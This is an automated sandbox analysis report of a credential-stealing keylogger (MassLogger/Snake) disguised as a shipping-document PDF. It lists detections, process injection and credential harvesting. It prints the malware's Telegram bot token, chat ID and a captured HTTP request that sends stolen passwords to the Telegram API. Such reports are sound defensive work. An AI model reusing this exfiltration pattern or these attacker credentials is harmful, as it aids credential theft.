
Windows Analysis Report
Shipment Document BL,INV and packing list.pdf.exe

Overview

General Information

Sample name: Shipment Document BL,INV and packing list.pdf.exe
Analysis ID: 1640472
MD5: 5fd799c047c81a8efb15d9a32f1d8e39
SHA1: fe01653460b4435266a8d3a3bdab26def6a9b2f7
SHA256: ffac68d784d7cd99536b0664ff0a765371c8bf0d0836fce71fa8a29afa9cb5c3

Detection

MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
Binary is likely a compiled AutoIt script file
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

[Classification chart: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale clean / suspicious / malicious]
  • System is w7x64
  • Shipment Document BL,INV and packing list.pdf.exe (PID: 3680 cmdline: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe" MD5: 5FD799C047C81A8EFB15D9A32F1D8E39)
    • RegSvcs.exe (PID: 3720 cmdline: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup
{
  "C2 url": "https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendMessage"
}
{
  "EXfil Mode": "Telegram",
  "Telegram Token": "7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg",
  "Telegram Chatid": "7632407857"
}
Source | Rule | Description | Author | Strings
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security |
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | matched strings:
  • 0xefb7:$a1: get_encryptedPassword
  • 0xf2df:$a2: get_encryptedUsername
  • 0xed52:$a3: get_timePasswordChanged
  • 0xee73:$a4: get_passwordField
  • 0xefcd:$a5: set_encryptedPassword
  • 0x10929:$a7: get_logins
  • 0x105da:$a8: GetOutlookPasswords
  • 0x103cc:$a9: StartKeylogger
  • 0x10879:$a10: KeyLoggerEventArgs
  • 0x10429:$a11: KeyLoggerEventArgsEventHandler

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe", CommandLine: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe", CommandLine|base64offset|contains: ., Image: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe, NewProcessName: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe", ProcessId: 3680, ProcessName: Shipment Document BL,INV and packing list.pdf.exe
Source: DNS query | Author: Brandon George (blog post), Thomas Patzke | Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, QueryName: checkip.dyndns.org

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T11:09:46.968357+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49163 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T11:09:40.070606+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49161 | 132.226.247.73 | 80 | TCP
2025-03-17T11:09:46.217032+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49161 | 132.226.247.73 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T11:09:46.712421+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.22 | 49163 | 149.154.167.220 | 443 | TCP

AV Detection

Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg", "Telegram Chatid": "7632407857"}
Source: RegSvcs.exe.3720.2.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendMessage"}
Source: Shipment Document BL,INV and packing list.pdf.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: Binary string: wntdll.pdb | source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355434952.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.356665790.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.22:49163 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.22:49163 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd651a7455f1ea
    Host: api.telegram.org
    Content-Length: 1089
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.112.1 (repeated 2 times)
Source: Joe Sandbox View | IP Address: 132.226.247.73
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View | JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | DNS query: name: checkip.dyndns.org (repeated 3 times)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49161 -> 132.226.247.73:80
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (repeated 2 times):
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (repeated 2 times):
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
    POST /bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd651a7455f1ea
    Host: api.telegram.org
    Content-Length: 1089
    Connection: Keep-Alive
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.orgX
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.comX
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.0000000002096000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002021000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879921863.00000000057F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/X
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.orgX
Source: RegSvcs.exe, 00000002.00000002.879921863.00000000057F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: RegSvcs.exe, 00000002.00000002.879921863.00000000057F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.orgX
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189X
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49163 version: TLS 1.2

System Summary

Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358518900.00000000011A4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_36456399-d
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358518900.00000000011A4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f6eaea43-4
Source: Shipment Document BL,INV and packing list.pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_bc045e3a-7
Source: Shipment Document BL,INV and packing list.pdf.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_ec850c34-a
Source: initial sample | Static PE information: Filename: Shipment Document BL,INV and packing list.pdf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: 770B0000 page execute and read and write
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355085552.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment Document BL,INV and packing list.pdf.exe
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355227026.0000000002B6D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment Document BL,INV and packing list.pdf.exe
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358453034.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRegSvcs.exeT vs Shipment Document BL,INV and packing list.pdf.exe
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs Shipment Document BL,INV and packing list.pdf.exe
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@5/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | File created: C:\Users\user\AppData\Local\Temp\aut6E2E.tmp
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts (repeated 4 times)
Source: Shipment Document BL,INV and packing list.pdf.exe | ReversingLabs: Detection: 50%
Source: unknown | Process created: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe" (repeated 2 times)
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdb | source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355434952.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.356665790.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Shipment Document BL,INV and packing list.pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | File created: \shipment document bl,inv and packing list.pdf.exe (repeated 2 times)

          Hooking and other Techniques for Hiding and Protection

